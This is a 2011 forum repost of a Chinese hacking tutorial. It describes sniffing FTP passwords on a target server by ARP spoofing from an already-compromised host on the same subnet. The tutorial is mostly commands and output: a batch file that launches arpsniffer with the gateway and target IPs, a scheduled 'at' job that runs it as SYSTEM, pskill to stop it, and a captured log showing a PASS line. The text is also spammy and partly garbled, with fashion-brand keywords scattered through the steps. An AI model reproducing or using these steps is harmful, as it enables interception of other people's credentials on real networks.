View Single Post
Old 05-15-2011, 03:39 AM   #1
alicetrade9i
 
Posts: n/a
Default 假假想攻打的主机ip是 61.139.1.79

  统一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆
,gucci women
    第一步:
    tracert 61.139.1.1
    C:\WIN2000\system32>tracert 61.139.1.1
    Tracing route to HACK-4FJ7EARC [61.139.1.1]
    over a maximum of 30 hops:
    1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]
    Trace complete.
    这就解释了你想攻打的主机跟你所在的主机在一个关网中那么就有可能
    进行ARPSNIFFER了
    第二步:看本机IP设置和网卡情形
    C:\WIN2000\system32>ipconfig /all
    Windows 2000 IP Configuration
    Host Name . . . . . . . . . . . . : smscomputer
    Primary DNS Suffix . . . . . . . :
    Node Type . . . . . . . . . . . . : Broadcast
    IP Routing Enabled. . . . . . . . : No
    WINS Proxy Enabled. . . . . . . . : No
    Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:
    Connection-specific DNS Suffix . :
    Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection
    Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6
    DHCP Enabled. . . . . . . . . . . : No
    IP Address. . . . . . . . . . . . : 61.139.1.2
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 61.139.1.65
    DNS Servers . . . . . . . . . . . : 61.139.1.73
    阐明只有一块网卡那么在执行ARPSNIFFER的时候就能够不要第五个参数了这个地
    方小榕的主页可没有说哟,经由测试我察觉如果只有一块网卡你第五个参数使用0
    的话也只能嗅探到通过自已的数据哟.
    从上面我们还可以晓得网关是61.139.1.65
    第三步:查看本机时间
    C:\WIN2000\system32>net time \\127.0.0.1
    \\127.0.0.1 确当前时光是 2003/1/28 下战书 09:13
    命令实现胜利
    要注意的是这儿的时间是12小时式,tory burch flip flops,用at命令应要24小时式
    第四步:编写启动ARPsniffer的bat文件
    C:\WIN2000\system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:\winnt\a.bat
    留神咯咱们不要第五个参数,contourabbel,假如有多个网卡的话你就要先直接执行arpsniffer显示如下:
    ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
    www.netXeyes.com 2002,mbt clearance, security@vip.sina.com
    Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter
    Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个处所选第五个参数)
    Usage: ArpSniffer [/RESET]
    第五步:后盾运行开端嗅探咯
    C:\winnt\system32>at \\127.0.0.1 20:44 c:\winnt\a.bat
  注意:这儿的时间要用24小时式
    arpsniffer最好拷到system32目录下,记载文件也会生成在这儿
    履行完第四步要先装置WINPCAP 2.1驱动同时arpsniffer要应用最新的0.5版,老版本有不少BUG而且要改注册表重启机 子
    第六步:看密码然而天生的记载文件不能直接看也不能拷贝所以我们只能先停止掉
    以SYSTEM权限启动的ARPSniffer程序
    C:\winnt\system32>pulist
    ...................
    conime.exe 248 NT AUTHORITY\SYSTEM
    explorer.exe 1864 SMSCOMPUTER\Administrator
    CSRSS.EXE 2256 NT AUTHORITY\SYSTEM
    Arpsniffer.exe 2322 NT AUTHORITY\SYSTEM ----就是它了!
    WINLOGON.EXE 2344 NT AUTHORITY\SYSTEM
    ......................
    杀了它
    C:\winnt\system32>pskill 2322
    PsKill v1.03 - local and remote process killer
    Copyright (C) 2000 Mark Russinovich
    http://www.sysinternals.com
    Process 2322 killed.
    C:\winnt\system32>type 1.txt 我的例子中嗅探的是FTP密码:)
    ...............
    61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb
    61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
    61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
    61.188.218.179(1404)->61.139.1.79(21)QUIT
    61.188.218.179(1404)->61.139.1.79(21)QUIT
    61.139.1.79(21)->61.188.218.179(1404)221
    61.139.1.79(21)->61.188.218.179(1404)221
    ............
    ............
    特殊要注意的就是PASS哈:)
    付录:
    前台畸形执行的显示
    C:\>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset
    ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
    www.netXeyes.com 2002, security@vip.sina.com
    Network Adapter 0: Intel(R) 8255x Based Network Connection
    Enable IP Router....OK
    Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02
    Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb
    Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6
    Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88
    Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88
    有时这儿要先显示can not open driver(0)不论它等一下就可以了
    Begin Sniffer.........
  本文来自:★Yes黑客同盟技巧论坛★
  http://www.yeshack.com/read.php?tid-116925-fpage-2.html
  Reply With Quote

Sponsored Links